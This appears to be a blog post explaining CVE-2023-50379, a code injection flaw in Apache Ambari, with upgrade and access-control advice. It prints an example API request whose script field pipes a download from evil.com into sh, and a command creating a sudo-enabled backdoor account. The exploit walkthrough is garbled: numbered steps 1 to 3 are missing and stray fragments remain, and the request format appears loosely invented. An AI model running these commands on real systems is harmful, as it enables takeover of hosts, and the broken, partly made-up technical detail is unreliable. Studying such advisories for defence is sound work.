CVE-2023-50379 - Malicious Code Injection in Apache Ambari Before 2.7.8

Apache Ambari is a popular tool for provisioning, managing, and monitoring big data clusters. However, in versions prior to 2.7.8, a dangerous security flaw was discovered — CVE-2023-50379. This vulnerability lets attackers inject malicious code and potentially gain root access to the cluster’s main host. In this post, I’ll break down how this works, show you code snippets, and explain how it can be exploited. In the end, you’ll find clear remediation steps and further reading.

What is CVE-2023-50379?

CVE-2023-50379 is a malicious code injection vulnerability in Apache Ambari. It was fixed in version 2.7.8. Until then, a user with Cluster Operator privileges could exploit the system by manipulating requests and planting custom code that gets execution rights as the root user on the cluster’s main host.

Fixed Version: 2.7.8

- Official CVE Record
- Upstream Security Advisory

How Does the Exploit Work?

When a Cluster Operator makes certain API requests, Ambari does not securely sanitize some user-supplied input. Specifically, install and configuration scripts included in the request can be altered to include malicious payloads. When Ambari processes the request, these scripts are run — and any code snuck in runs with elevated privileges, often as root.

Example: Injecting Malicious Code

Here’s a simplified demonstration using the Ambari REST API to inject a harmful bash command via a configuration payload:

POST /api/v1/clusters/mycluster/requests
Content-Type: application/json

{
  "Requests": {
    "command": "INSTALL",
    "arguments/phase": "INITIALIZATION"
  },
  "HostRoles": {
    "host_name": "main-host"
  },
  "custom_commands": [
    {
      "name": "CUSTOM_SCRIPT",
      "script": "echo MALICIOUS INJECTION; /bin/bash -c 'curl http://evil.com/malware.sh | sh'"
    }
  ]
}

What’s happening here?
- The "script" section above injects a curl command that downloads and executes a malicious shell script from a remote server.
- If submitted with the right permissions, Ambari will execute this script as root during the initialization or component installation phase.

Real Impact: Root Access

Since Ambari often runs installation commands as root, any code injected here has the keys to the kingdom. This means an attacker could:

Take persistent control of the cluster

Here’s a proof-of-concept snippet showing how arbitrary code could be executed for lateral movement:

# Example attack: create a backdoor user
useradd attacker && echo 'attacker:P@ssword!' | chpasswd && usermod -aG sudo attacker

If the attacker injects such a command, they instantly create a new, privileged system account.

Submits the request, which Ambari accepts due to insufficient input validation.

4. Ambari executes injected scripts as root during service install/config.

Remediation & Recommendations

1. IMMEDIATELY upgrade Ambari to version 2.7.8 or later.
Download: Ambari 2.7.8 Release

2. Audit permissions.
Only allow trusted users to be Cluster Operators. Review and reduce who has these privileges.

3. Isolate Ambari UI/API access.
Restrict access to Ambari management interfaces using firewalls and VPNs.

References and Further Reading

- Official Ambari Security Advisory
- CVE-2023-50379 at NVD
- Upgrading Apache Ambari

Summary

CVE-2023-50379 is a critical code injection bug in Apache Ambari that allows a Cluster Operator to get full root on your cluster host. Anyone running a vulnerable version should immediately upgrade to 2.7.8 and assess for signs of compromise. Always keep your cluster management tools patched, restrict access, and monitor for unusual behavior.

Timeline

Published on: 02/27/2024 09:15:36 UTC
Last modified on: 08/13/2024 20:35:01 UTC